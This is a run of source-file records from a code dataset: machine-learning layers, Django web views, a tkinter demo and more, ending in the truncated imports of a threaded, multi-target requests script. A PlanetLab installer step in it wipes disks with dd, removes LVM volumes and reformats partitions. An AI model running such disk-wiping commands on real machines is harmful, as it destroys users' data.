the output dimensions as a tuple; as_list() converts it into a list\n # Every layer's input and output is a batch of matrices, so the shape obtained here includes the number of examples in a batch\n pool_shape = pool2.get_shape().as_list()\n\n # The length after flattening the matrix into a vector is the product of the matrix's width, height and depth.\n # pool_shape[0] is the number of examples in a batch.\n nodes = pool_shape[1] * pool_shape[2] * pool_shape[3]\n\n # tf.reshape turns the fourth layer's output into a batch of vectors.\n reshaped = tf.reshape(pool2, [pool_shape[0], nodes]) #[1, 7X7X64]\n\n # Declare the variables of the fifth (fully connected) layer and implement its forward pass.\n # 3136->512: the input is the flattened vector of length 3136, the output is a vector of length 512\n # Dropout is used here; 
dropout is generally applied to fully connected layers.\n with tf.variable_scope('layer5_fc1'):\n fc1_weights = tf.get_variable(\n 'weight', [nodes, FC_SIZE], \n initializer = tf.truncated_normal_initializer(stddev=0.1))\n # Only the weights of the fully connected layers need regularization\n # The purpose of regularization is to prevent overfitting\n if regularizer is not None:\n tf.add_to_collection('losses', regularizer(fc1_weights))\n # add the regularization term for the weight matrix fc1_weights to the 'losses' collection \n fc1_biases = tf.get_variable('bias', [FC_SIZE], initializer=tf.constant_initializer(0.1))\n fc1 = tf.nn.relu(tf.matmul(reshaped, fc1_weights) + fc1_biases)\n\n # 'train' is the flag passed in to decide whether to apply dropout\n if train:\n fc1 = tf.nn.dropout(fc1, 0.5)\n\n # Declare the variables of the sixth (fully connected) layer and implement its forward pass\n # 512->10: passing the output through softmax gives the final classification result\n with tf.variable_scope('Layer6_fc2'):\n fc2_weights = tf.get_variable(\n 'weight', [FC_SIZE, NUM_LABELS], initializer =\n tf.truncated_normal_initializer(stddev=0.1))\n if regularizer is not None:\n tf.add_to_collection('losses', regularizer(fc2_weights))\n fc2_biases = tf.get_variable('bias', [NUM_LABELS], initializer =\n tf.constant_initializer(0.1))\n logit = tf.matmul(fc1, fc2_weights) + fc2_biases\n\n return logit\n","sub_path":"LeNet-5/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":5677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"71409470","text":"from rest_framework import viewsets\nfrom rest_framework.response import Response\nfrom rest_framework import permissions\n\nfrom halemate_auth.models import User\nfrom halemate_auth.serializers.user import UserUpdateSerializer\nfrom halemate_auth.serializers.hospital import (\n HospitalSerializer,\n HospitalShortSerializer,\n HospitalViewSerializer,\n)\nfrom halemate_auth.permissions import (\n isVerified,\n NoPost,\n IsUserOrAdminOrReadOnly,\n)\n\n\nclass HospitalViewSet(viewsets.ModelViewSet):\n queryset = User.objects.filter(registered_as='H')\n serializer_class = HospitalSerializer\n permission_classes = [permissions.IsAuthenticated,\n IsUserOrAdminOrReadOnly,\n isVerified,\n NoPost,\n ]\n\n def list(self, request, *args, **kwargs):\n queryset = User.objects.filter(registered_as='H')\n page = self.paginate_queryset(queryset)\n if page is not None:\n serializer = HospitalShortSerializer(page, many=True)\n return self.get_paginated_response(serializer.data)\n serializer = HospitalShortSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def retrieve(self, request, *args, **kwargs):\n instance = self.get_object()\n serializer = self.get_serializer(instance)\n ser_data = serializer.data\n if instance.id == request.user.id:\n return Response(ser_data)\n else:\n ser_data.pop('hospital_appointments')\n return Response(ser_data)\n\n def get_serializer_class(self):\n serializer_class = self.serializer_class\n if self.request.method == 'GET':\n serializer_class = HospitalViewSerializer\n if self.request.method == 'PUT' or self.request.method == 'PATCH':\n serializer_class = UserUpdateSerializer\n return serializer_class\n","sub_path":"halemate_auth/views/hospital.py","file_name":"hospital.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"248154996","text":"import tkinter\r\nfrom tkinter import ttk\r\n\r\n\r\nwin = tkinter.Tk()\r\n\r\nwin.title(\"框架frame示例窗口\")\r\nwin.geometry(\"600x400+300+20\")\r\n\r\n# Create a table (or tree) widget\r\ntable = ttk.Treeview(win)\r\ntable.pack()\r\n\r\n# Define the table's columns\r\ntable[\"columns\"]=(\"name\",\"age\",\"height\",\"weight\")\r\n\r\n# Set the width of each column\r\ntable.column(\"name\", width=100)\r\ntable.column(\"age", 
width=100)\ntable.column(\"height\", width=100)\ntable.column(\"weight\", width=100)\n\n# 设置每个列的头,并指定显示名称\ntable.heading(\"name\", text=\"姓名\")\ntable.heading(\"age\", text=\"年龄\")\ntable.heading(\"height\", text=\"身高\")\ntable.heading(\"weight\", text=\"体重\")\n\n# 插入数据,第一个字段空字符串表示该数据所属的上级为空,即顶级,第二个字段表示数据行标识,从0开始\n# values是真正插入的值,元组\ntable.insert(\"\", 0, text=\"line1\", values=(\"崔晓东\", 33, 176, 75))\ntable.insert(\"\", 1, text=\"line2\", values=(\"程咬金\", 13, 176, 75))\n\n\n# 定义一个树状结构,跟前面表状的一样\ntree = ttk.Treeview(win)\ntree.pack()\n\n# 插入根节点\ntreeroot1 = tree.insert(\"\", 0, \"中国\", text=\"中国\", values=\"CHN\")\ntreeroot2 = tree.insert(\"\", 1, \"美国\", text=\"美国\", values=\"USA\")\n\n# 在中国这个根节点下插入一级节点\nleaf1_1 = tree.insert(treeroot1, 0, \"浙江\", text=\"浙江\", values=\"ZJ\")\nleaf1_2 = tree.insert(treeroot1, 1, \"江苏\", text=\"江苏\", values=\"JS\")\n\n# 在两个省份一级节点下各自插入两个二级城市节点\nleaf2_11 = tree.insert(leaf1_1, 0, \"杭州\", text=\"杭州\", values=\"hz\")\nleaf2_12 = tree.insert(leaf1_1, 1, \"宁波\", text=\"宁波\", values=\"nb\")\n\nleaf2_21 = tree.insert(leaf1_2, 0, \"南京\", text=\"南京\", values=\"nj\")\nleaf2_22 = tree.insert(leaf1_2, 1, \"盐城\", text=\"盐城\", values=\"yc\")\n\nwin.mainloop()","sub_path":"17.GUI编程tkinter模块四/table_tree.py","file_name":"table_tree.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"336755512","text":"from django.shortcuts import render, redirect, HttpResponse, reverse\nfrom my_crm import models\nfrom my_crm.forms import RegForm, CustomerForm\nimport hashlib\nfrom django.conf import global_settings\nfrom django.contrib.sessions.backends import db\nfrom django.views import View\nfrom django.db.models import Q\nfrom my_crm.utils.pagination import Pagination\nfrom django.http.request import QueryDict\n\n\ndef index(request):\n return HttpResponse('index')\n\n\ndef login(request):\n err_msg = ''\n if request.method == 'POST':\n user = request.POST.get('user')\n pwd = request.POST.get('pwd')\n md5 = hashlib.md5()\n md5.update(pwd.encode('utf-8'))\n pwd = md5.hexdigest()\n obj = models.UserProfile.objects.filter(username=user, password=pwd, is_active=True).first()\n if obj:\n request.session['user_id'] = obj.pk\n return redirect('/index/')\n err_msg = '用户名或密码错误'\n return render(request, 'login.html', {'err_msg': err_msg})\ndef logout(request):\n request.session.flush()\n return redirect(reverse('login'))\n\n\ndef reg(request):\n form_obj = RegForm()\n if request.method == 'POST':\n form_obj = RegForm(request.POST)\n if form_obj.is_valid():\n form_obj.save()\n return redirect('/login/')\n\n return render(request, 'reg.html', {'form_obj': form_obj})\n\n\ndef customer_list(request):\n if request.path_info == reverse('customer_list'):\n all_customer = models.Customer.objects.filter(consultant__isnull=True, )\n else:\n all_customer = models.Customer.objects.filter(consultant=request.account)\n\n return render(request, 'customer_list.html', {'all_customer': all_customer})\n\n\nclass CustomerList(View):\n\n def get(self, request):\n\n q = self.search(['qq', 'name', ])\n\n if request.path_info == reverse('customer_list'):\n all_customer = models.Customer.objects.filter(q, consultant__isnull=True, )\n else:\n all_customer = models.Customer.objects.filter(q, consultant=request.account)\n\n pager = Pagination(request.GET.get('page', '1'), all_customer.count(), request.GET.copy(), 2)\n return render(request, 'customer_list.html', {\n 'all_customer': all_customer[pager.start: pager.end],\n 
'page_html': pager.page_html\n })\n\n def post(self, request):\n action = request.POST.get('action')\n\n if not hasattr(self, action):\n return HttpResponse('非法操作')\n\n getattr(self, action)()\n\n return self.get(request)\n\n def multi_apply(self):\n ids = self.request.POST.getlist('id')\n models.Customer.objects.filter(id__in=ids).update(consultant=self.request.account)\n def multi_public(self):\n ids = self.request.POST.getlist('id')\n models.Customer.objects.filter(id__in=ids).update(consultant=None)\n def search(self, query_list):\n query = self.request.GET.get('query', '')\n q = Q()\n q.connector = 'OR'\n for i in query_list:\n q.children.append(Q(('{}__contains'.format(i), query)))\n\n return q\n\n\nuserlist = [{'name': 'alex-{}'.format(i), 'pwd': \"alexdsb-{}\".format(i)} for i in range(1, 402)]\n\n\ndef user_list(request):\n try:\n page = int(request.GET.get('page', '1'))\n if page <= 0:\n page = 1\n except Exception as e:\n page = 1\n print(page)\n per_num = 15\n all_count = len(userlist)\n page_num, more = divmod(all_count, per_num)\n if more:\n page_num += 1\n max_show = 11\n half_show = max_show // 2\n\n if page_num < max_show:\n page_start = 1\n page_end = page_num\n else:\n if page <= half_show:\n page_start = 1\n page_end = max_show\n elif page + half_show > page_num:\n page_start = page_num - max_show + 1\n page_end = page_num\n else:\n page_start = page - half_show\n page_end = page + half_show\n\n \"\"\"\n 1 0 15\n 2 15 30\n 3 30 45\n \"\"\"\n start = (page - 1) * per_num\n end = page * per_num\n\n li_list = []\n if page == 1:\n li_list.append('
<li class=\"disabled\"><a><<</a></li>')\n else:\n li_list.append('<li><a href=\"?page={}\"><<</a></li>'.format(page - 1))\n\n for i in range(page_start, page_end + 1):\n if page == i:\n li_list.append('<li class=\"active\"><a href=\"?page={}\">{}</a></li>'.format(i, i))\n else:\n li_list.append('<li><a href=\"?page={}\">{}</a></li>'.format(i, i))\n\n if page == page_num:\n li_list.append('<li class=\"disabled\"><a>>></a></li>')\n else:\n li_list.append('<li><a href=\"?page={}\">>></a></li>'.format(page + 1))\n\n page_html = ''.join(li_list)\n\n return render(request, 'user_list.html',\n {\"all_user\": userlist[start:end],\n 'page_html': page_html\n }, )\n\n\ndef user_list(request):\n pager = Pagination(request.GET.get('page', '1'), len(userlist), per_num=10, max_show=15)\n\n return render(request, 'user_list.html',\n {\"all_user\": userlist[pager.start:pager.end],\n 'page_html': pager.page_html\n }, )\ndef customer_add(request):\n form_obj = CustomerForm()\n if request.method == 'POST':\n form_obj = CustomerForm(request.POST)\n if form_obj.is_valid():\n\n form_obj.save()\n return redirect(reverse('customer_list'))\n return render(request, 'customer_add.html', {'form_obj': form_obj})\ndef customer_edit(request, edit_id):\n obj = models.Customer.objects.filter(pk=edit_id).first()\n form_obj = CustomerForm(instance=obj)\n if request.method == 'POST':\n form_obj = CustomerForm(request.POST, instance=obj)\n if form_obj.is_valid():\n form_obj.save()\n return redirect(reverse('customer_list'))\n return render(request, 'customer_edit.html', {'form_obj': form_obj})\ndef customer_change(request, edit_id=None):\n obj = models.Customer.objects.filter(pk=edit_id).first()\n form_obj = CustomerForm(instance=obj)\n if request.method == 'POST':\n form_obj = CustomerForm(request.POST, instance=obj)\n if form_obj.is_valid():\n form_obj.save()\n return redirect(reverse('customer_list'))\n return render(request, 'customer_change.html', {'form_obj': form_obj, 'edit_id': edit_id})\n","sub_path":"my_app/new_plane/my_crm/my_views/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"147776752","text":"class Solution:\n def findAndReplacePattern(self, words, ptn):\n\n def solve(w):\n p = {}\n for i in range(len(w)):\n if ord(w[i]) not in p:\n p[ord(w[i])] = [i]\n else:\n p[ord(w[i])].append(i)\n return sorted(p.values())\n\n std = solve(ptn)\n ans = []\n for word in words:\n if solve(word) == std: ans.append(word)\n return ans\n","sub_path":"Python/find-and-replace-pattern.py","file_name":"find-and-replace-pattern.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"316567197","text":"#\n# Copyright (c) 2003 Intel Corporation\n# All rights reserved.\n#\n# Copyright (c) 2004-2006 The Trustees of Princeton University\n# All rights reserved.\n# expected /proc/partitions format\n\nimport os, sys\nimport string\nimport popen2\nimport time\n\nfrom Exceptions import *\nimport utils\nimport BootServerRequest\nimport BootAPI\nimport ModelOptions\n\ndef Run(vars, log):\n \"\"\"\n Setup the block devices for install, partition them w/ LVM\n\n Expect the following variables from the store:\n INSTALL_BLOCK_DEVICES list of block devices to install onto\n TEMP_PATH somewhere to store what we need to run\n ROOT_SIZE the size of the root logical volume\n SWAP_SIZE the size of the swap partition\n \"\"\"\n\n log.write(\"\\n\\nStep: Install: partitioning disks.\\n\")\n\n # make sure we have the variables we need\n try:\n TEMP_PATH = vars[\"TEMP_PATH\"]\n if TEMP_PATH == \"\":\n raise ValueError(\"TEMP_PATH\")\n\n INSTALL_BLOCK_DEVICES = vars[\"INSTALL_BLOCK_DEVICES\"]\n if(len(INSTALL_BLOCK_DEVICES) == 0):\n raise ValueError(\"INSTALL_BLOCK_DEVICES is empty\")\n\n # use vs_ROOT_SIZE or lxc_ROOT_SIZE as appropriate\n varname = vars['virt'] + \"_ROOT_SIZE\"\n ROOT_SIZE = vars[varname]\n if ROOT_SIZE 
== \"\" or ROOT_SIZE == 0:\n raise ValueError(\"ROOT_SIZE invalid\")\n\n SWAP_SIZE = vars[\"SWAP_SIZE\"]\n if SWAP_SIZE == \"\" or SWAP_SIZE == 0:\n raise ValueError(\"SWAP_SIZE invalid\")\n\n NODE_MODEL_OPTIONS = vars[\"NODE_MODEL_OPTIONS\"]\n\n PARTITIONS = vars[\"PARTITIONS\"]\n if PARTITIONS == None:\n raise ValueError(\"PARTITIONS\")\n\n if NODE_MODEL_OPTIONS & ModelOptions.RAWDISK:\n VSERVERS_SIZE = \"-1\"\n if \"VSERVERS_SIZE\" in vars:\n VSERVERS_SIZE = vars[\"VSERVERS_SIZE\"]\n if VSERVERS_SIZE == \"\" or VSERVERS_SIZE == 0:\n raise ValueError(\"VSERVERS_SIZE\")\n\n except KeyError as var:\n raise BootManagerException(\"Missing variable in vars: {}\\n\".format(var))\n except ValueError as var:\n raise BootManagerException(\"Variable in vars, shouldn't be: {}\\n\".format(var))\n\n bs_request = BootServerRequest.BootServerRequest(vars)\n\n\n # disable swap if its on\n utils.sysexec_noerr(\"swapoff {}\".format(PARTITIONS[\"swap\"]), log)\n\n # shutdown and remove any lvm groups/volumes\n utils.sysexec_noerr(\"vgscan\", log)\n utils.sysexec_noerr(\"vgchange -ay\", log)\n utils.sysexec_noerr(\"lvremove -f {}\".format(PARTITIONS[\"root\"]), log)\n utils.sysexec_noerr(\"lvremove -f {}\".format(PARTITIONS[\"swap\"]), log)\n utils.sysexec_noerr(\"lvremove -f {}\".format(PARTITIONS[\"vservers\"]), log)\n utils.sysexec_noerr(\"vgchange -an\", log)\n utils.sysexec_noerr(\"vgremove -f planetlab\", log)\n\n log.write(\"Running vgscan for devices\\n\")\n utils.sysexec_noerr(\"vgscan\", log)\n\n used_devices = []\n\n INSTALL_BLOCK_DEVICES.sort()\n\n for device in INSTALL_BLOCK_DEVICES:\n if single_partition_device(device, vars, log):\n if (len(used_devices) > 0 and\n (vars['NODE_MODEL_OPTIONS'] & ModelOptions.RAWDISK)):\n log.write(\"Running in raw disk mode, not using {}.\\n\".format(device))\n else:\n used_devices.append(device)\n log.write(\"Successfully initialized {}\\n\".format(device))\n else:\n log.write(\"Unable to partition {}, not using it.\\n\".format(device))\n continue\n\n # list of devices to be used with vgcreate\n vg_device_list = \"\"\n\n # get partitions\n partitions = []\n for device in used_devices:\n part_path = get_partition_path_from_device(device, vars, log)\n partitions.append(part_path)\n\n # create raid partition\n raid_partition = create_raid_partition(partitions, vars, log)\n if raid_partition != None:\n partitions = [raid_partition]\n log.write(\"partitions={}\\n\".format(partitions))\n # initialize the physical volumes\n for part_path in partitions:\n if not create_lvm_physical_volume(part_path, vars, log):\n raise BootManagerException(\"Could not create lvm physical volume \"\n \"on partition {}\".format(part_path))\n vg_device_list = vg_device_list + \" \" + part_path\n\n # create an lvm volume group\n utils.sysexec(\"vgcreate -s32M planetlab {}\".format(vg_device_list), log)\n\n # create swap logical volume\n utils.sysexec(\"lvcreate -L{} -nswap planetlab\".format(SWAP_SIZE), log)\n\n # check if we want a separate partition for VMs\n one_partition = vars['ONE_PARTITION']=='1'\n if one_partition:\n remaining_extents = get_remaining_extents_on_vg(vars, log)\n utils.sysexec(\"lvcreate -l{} -nroot planetlab\".format(remaining_extents), log)\n else:\n utils.sysexec(\"lvcreate -L{} -nroot planetlab\".format(ROOT_SIZE), log)\n if vars['NODE_MODEL_OPTIONS'] & ModelOptions.RAWDISK and VSERVERS_SIZE != \"-1\":\n utils.sysexec(\"lvcreate -L{} -nvservers planetlab\".format(VSERVERS_SIZE), log)\n remaining_extents = get_remaining_extents_on_vg(vars, log)\n 
utils.sysexec(\"lvcreate -l{} -nrawdisk planetlab\".format(remaining_extents), log)\n else:\n # create vservers logical volume with all remaining space\n # first, we need to get the number of remaining extents we can use\n remaining_extents = get_remaining_extents_on_vg(vars, log)\n utils.sysexec(\"lvcreate -l{} -nvservers planetlab\".format(remaining_extents), log)\n\n # activate volume group (should already be active)\n #utils.sysexec(TEMP_PATH + \"vgchange -ay planetlab\", log)\n\n # make swap\n utils.sysexec(\"mkswap -f {}\".format(PARTITIONS[\"swap\"]), log)\n\n # check if badhd option has been set\n option = ''\n txt = ''\n if NODE_MODEL_OPTIONS & ModelOptions.BADHD:\n option = '-c'\n txt = \" with bad block search enabled, which may take a while\"\n\n # filesystems partitions names and their corresponding\n # reserved-blocks-percentages\n filesystems = {\"root\": 5, \"vservers\": 0}\n\n # ROOT filesystem is always with ext2\n fs = 'root'\n rbp = filesystems[fs]\n devname = PARTITIONS[fs]\n log.write(\"formatting {} partition ({}){}.\\n\".format(fs, devname, txt))\n utils.sysexec(\"mkfs.ext2 -q {} -m {} -j {}\".format(option, rbp, devname), log)\n # disable time/count based filesystems checks\n utils.sysexec_noerr(\"tune2fs -c -1 -i 0 {}\".format(devname), log)\n\n # VSERVER filesystem with btrfs to support snapshoting and stuff\n fs = 'vservers'\n rbp = filesystems[fs]\n devname = PARTITIONS[fs]\n if vars['virt'] == 'vs':\n log.write(\"formatting {} partition ({}){}.\\n\".format(fs, devname, txt))\n utils.sysexec(\"mkfs.ext2 -q {} -m {} -j {}\".format(option, rbp, devname), log)\n # disable time/count based filesystems checks\n utils.sysexec_noerr(\"tune2fs -c -1 -i 0 {}\".format(devname), log)\n elif not one_partition:\n log.write(\"formatting {} btrfs partition ({}).\\n\".format(fs, devname))\n # early BootCD's seem to come with a version of mkfs.btrfs that does not support -f\n # let's check for that before invoking it\n mkfs = \"mkfs.btrfs\"\n if os.system(\"mkfs.btrfs --help 2>&1 | grep force\") == 0:\n mkfs += \" -f\"\n mkfs += \" {}\".format(devname)\n utils.sysexec(mkfs, log)\n # as of 2013/02 it looks like there's not yet an option to set fsck frequency with btrfs\n\n # save the list of block devices in the log\n log.write(\"Block devices used (in lvm): {}\\n\".format(repr(used_devices)))\n\n # list of block devices used may be updated\n vars[\"INSTALL_BLOCK_DEVICES\"] = used_devices\n\n utils.display_disks_status(PARTITIONS, \"End of InstallPartitionDisks\", log)\n\n return 1\n\n\nimport parted\ndef single_partition_device(device, vars, log):\n \"\"\"\n initialize a disk by removing the old partition tables,\n and creating a new single partition that fills the disk.\n\n return 1 if sucessful, 0 otherwise\n \"\"\"\n\n # two forms, depending on which version of pyparted we have\n # v1 does not have a 'version' method\n # v2 and above does, but to make it worse,\n # parted-3.4 on f14 has parted.version broken and raises SystemError\n try:\n parted.version()\n return single_partition_device_2_x(device, vars, log)\n except AttributeError:\n # old parted does not have version at all\n return single_partition_device_1_x(device, vars, log)\n except SystemError:\n # let's assume this is >=2\n return single_partition_device_2_x(device, vars, log)\n except:\n raise\n\ndef single_partition_device_1_x(device, vars, log):\n\n lvm_flag = parted.partition_flag_get_by_name('lvm')\n\n try:\n log.write(\"Using pyparted 1.x\\n\")\n # wipe the old partition table\n utils.sysexec(\"dd 
if=/dev/zero of={} bs=512 count=1\".format(device), log)\n\n # get the device\n dev = parted.PedDevice.get(device)\n\n # create a new partition table\n disk = dev.disk_new_fresh(parted.disk_type_get(\"msdos\"))\n\n # create one big partition on each block device\n constraint = dev.constraint_any()\n\n new_part = disk.partition_new(\n parted.PARTITION_PRIMARY,\n parted.file_system_type_get(\"ext2\"),\n 0, 1)\n\n # make it an lvm partition\n new_part.set_flag(lvm_flag, 1)\n\n # actually add the partition to the disk\n disk.add_partition(new_part, constraint)\n\n disk.maximize_partition(new_part,constraint)\n\n disk.commit()\n del disk\n\n except BootManagerException as exc:\n log.write(\"BootManagerException while running: {}\\n\".format(str(exc)))\n return 0\n\n except parted.error as exc:\n log.write(\"parted exception while running: {}\\n\".format(str(exc)))\n return 0\n\n return 1\n\n\n\ndef single_partition_device_2_x(device, vars, log):\n try:\n log.write(\"Using pyparted 2.x\\n\")\n\n # Thierry june 2012 -- for disks larger than 2TB\n # calling this with part_type='msdos' would fail at the maximizePartition stage\n # create a new partition table\n def partition_table(device, part_type, fs_type):\n # wipe the old partition table\n utils.sysexec(\"dd if=/dev/zero of={} bs=512 count=1\".format(device), log)\n # get the device\n dev = parted.Device(device)\n disk = parted.freshDisk(dev, part_type)\n # create one big partition on each block device\n constraint = parted.constraint.Constraint(device=dev)\n geometry = parted.geometry.Geometry(device=dev, start=0, end=1)\n fs = parted.filesystem.FileSystem(type=fs_type, geometry=geometry)\n new_part = parted.partition.Partition(disk, type=parted.PARTITION_NORMAL,\n fs=fs, geometry=geometry)\n # make it an lvm partition\n new_part.setFlag(parted.PARTITION_LVM)\n # actually add the partition to the disk\n disk.addPartition(new_part, constraint)\n disk.maximizePartition(new_part, constraint)\n disk.commit()\n log.write(\"Current disk for {} - partition type {}\\n{}\\n\".format(device, part_type, disk))\n log.write(\"Current dev for {}\\n{}\\n\".format(device, dev))\n del disk\n\n try:\n partition_table(device, 'msdos', 'ext2')\n except:\n partition_table(device, 'gpt', 'ext2')\n\n except Exception as e:\n log.write(\"Exception inside single_partition_device_2_x : {}\\n\".format(str(e)))\n import traceback\n traceback.print_exc(file=log)\n return 0\n\n return 1\n\n\n\ndef create_lvm_physical_volume(part_path, vars, log):\n \"\"\"\n make the specificed partition a lvm physical volume.\n\n return 1 if successful, 0 otherwise.\n \"\"\"\n\n try:\n # again, wipe any old data, this time on the partition\n utils.sysexec(\"dd if=/dev/zero of={} bs=512 count=1\".format(part_path), log)\n ### patch Thierry Parmentelat, required on some hardware\n import time\n time.sleep(1)\n utils.sysexec(\"pvcreate -ffy {}\".format(part_path), log)\n except BootManagerException as e:\n log.write(\"create_lvm_physical_volume failed.\\n\")\n return 0\n\n return 1\n\n\ndef create_raid_partition(partitions, vars, log):\n \"\"\"\n create raid array using specified partitions.\n \"\"\"\n raid_part = None\n raid_enabled = False\n node_tags = BootAPI.call_api_function(vars, \"GetNodeTags\",\n ({'node_id': vars['NODE_ID']},))\n for node_tag in node_tags:\n if node_tag['tagname'] == 'raid_enabled' and \\\n node_tag['value'] == '1':\n raid_enabled = True\n break\n if not raid_enabled:\n return raid_part\n\n try:\n log.write(\"Software raid enabled.\\n\")\n # wipe everything\n 
utils.sysexec_noerr(\"mdadm --stop /dev/md0\", log)\n time.sleep(1)\n for part_path in partitions:\n utils.sysexec_noerr(\"mdadm --zero-superblock {} \".format(part_path), log)\n\n # assume each partiton is on a separate disk\n num_parts = len(partitions)\n if num_parts < 2:\n log.write(\"Not enough disks for raid. Found: {}\\n\".format(partitions))\n raise BootManagerException(\"Not enough disks for raid. Found: {}\\n\".format(partitions))\n if num_parts == 2:\n lvl = 1\n else:\n lvl = 5\n\n # make the array\n part_list = \" \".join(partitions)\n raid_part = \"/dev/md0\"\n cmd = \"mdadm --create {raid_part} --chunk=128 --level=raid{lvl} \"\\\n \"--raid-devices={num_parts} {part_list}\".format(**locals())\n utils.sysexec(cmd, log)\n\n except BootManagerException as e:\n log.write(\"create_raid_partition failed.\\n\")\n raid_part = None\n\n return raid_part\n\n\ndef get_partition_path_from_device(device, vars, log):\n \"\"\"\n given a device, return the path of the first partition on the device\n \"\"\"\n\n # those who wrote the cciss driver just had to make it difficult\n cciss_test = \"/dev/cciss\"\n if device[:len(cciss_test)] == cciss_test:\n part_path = device + \"p1\"\n else:\n part_path = device + \"1\"\n\n return part_path\n\n\n\ndef get_remaining_extents_on_vg(vars, log):\n \"\"\"\n return the free amount of extents on the planetlab volume group\n \"\"\"\n\n c_stdout, c_stdin = popen2.popen2(\"vgdisplay -c planetlab\")\n result = string.strip(c_stdout.readline())\n c_stdout.close()\n c_stdin.close()\n remaining_extents = string.split(result, \":\")[15]\n\n return remaining_extents\n","sub_path":"source/steps/InstallPartitionDisks.py","file_name":"InstallPartitionDisks.py","file_ext":"py","file_size_in_byte":14821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"162284964","text":"from typing import Dict, Union, Optional\nimport torch\n\nfrom allennlp.data.vocabulary import Vocabulary\nfrom allennlp.models.model import Model\nfrom allennlp.modules.seq2vec_encoders import BertPooler\nfrom allennlp.nn.util import get_text_field_mask\n\nfrom my_library.models.layers import bert_embeddings\n\n\n@Model.register(\"bert_encoder\")\nclass BertEncoder(Model):\n def __init__(\n self,\n vocab: Vocabulary,\n bert_path: str,\n dropout: float = 0.0,\n trainable: bool = False,\n ) -> None:\n super().__init__(vocab)\n\n self._embeddings = bert_embeddings(pretrained_model=bert_path,\n training=trainable)\n self.pooler = BertPooler(pretrained_model=bert_path,\n dropout=dropout)\n\n def forward( # type: ignore\n self, text: Dict[str, torch.LongTensor]) -> torch.Tensor:\n mask = get_text_field_mask(text)\n emb = self._embeddings(text)\n encoding = self.pooler(emb, mask)\n\n return encoding\n","sub_path":"my_library/models/feature_extractor_bert.py","file_name":"feature_extractor_bert.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"465695688","text":"\"\"\"HelloWorld URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. 
Import the include() function: from django.urls import include, path\r\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\r\nfrom django.contrib import staticfiles\r\nfrom django.conf.urls import url\r\nfrom . import search #导入search.py\r\nfrom login.views import index,login,register,info,infochange,redict\r\nfrom review.views import submit\r\nfrom history.views import recommend,detail,dfind,find,testfind\r\nurlpatterns = [\r\n\r\n #进入系统首页\r\n url(r'^$', index),\r\n\r\n #登录\r\n url(r'^login/$',login),\r\n\r\n #注册\r\n url(r'^register/$',register),\r\n\r\n #搜索\r\n url(r'^search$', search.search),\r\n\r\n #论文数量排名\r\n # 直方图统计\r\n url(r'^echarts.html$', search.Echarts),\r\n # 地图热图统计\r\n url(r'^chinamap.html$',search.Chinamap),\r\n\r\n #首页功能(获取session用户名)\r\n url(r'^searchfirst$', search.search_form),\r\n\r\n #翻页\r\n url(r'^page$', search.Page),\r\n\r\n #右侧扇形图\r\n url(r'^echarts-cirle.html$', search.Echscirle),\r\n\r\n #评论入口\r\n url(r'^insert$', search.insert),\r\n\r\n #提交评论\r\n url(r'^submit$',submit),\r\n\r\n #推荐论文入口\r\n url(r'^recommend/$',recommend),\r\n\r\n #知识图谱\r\n url(r'^graphnpm$', search.Graph),\r\n\r\n #个人信息入口\r\n url(r'^info/$',info),\r\n\r\n #修改个人信息\r\n url(r'^infochange$',infochange),\r\n\r\n #修改信息后重定向到首页\r\n url(r'^redict$',redict),\r\n\r\n #查看详情论文\r\n url(r'^detail$',detail),\r\n\r\n #论文查找入口\r\n url(r'^dfind$',dfind),\r\n #点击查看论文功能\r\n url(r'^find$',find),\r\n url(r'^testfind$',testfind),\r\n]\r\n#静态文件处理1.4版本需要\r\nurlpatterns += staticfiles_urlpatterns()\r\n","sub_path":"HelloWorld/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"65065357","text":"#!/usr/bin/env python\n# -- coding:utf-8 -*-\nfrom collections import Counter\ntry:\n import cPickle as pickle\nexcept:\n import pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef main():\n m_list = pickle.load(open('neko.txt.mecab.pkl', 'rb'))\n word_list = []\n for words in m_list:\n str_list = [dic['surface'] for dic in words]\n word_list.extend(str_list)\n ranking = Counter(word_list).most_common()\n\n plt.xscale('log')\n plt.yscale('log')\n plt.scatter(np.arange(len(ranking)) + 1, [v for k, v in ranking])\n # こっちでも同じ結果になる\n # plt.loglog(np.arange(len(ranking)) + 1, [v for k, v in ranking], 'o')\n plt.show()\n\nif __name__ == '__main__':\n main()\n","sub_path":"chapter4/k39.py","file_name":"k39.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"627753333","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python3\n\nimport sys\nimport requests\nimport re\nfrom multiprocessing.dummy import Pool\n\nrequests.urllib3.disable_warnings()\n\ntry:\n target = [i.strip() for i in open(sys.argv[1], 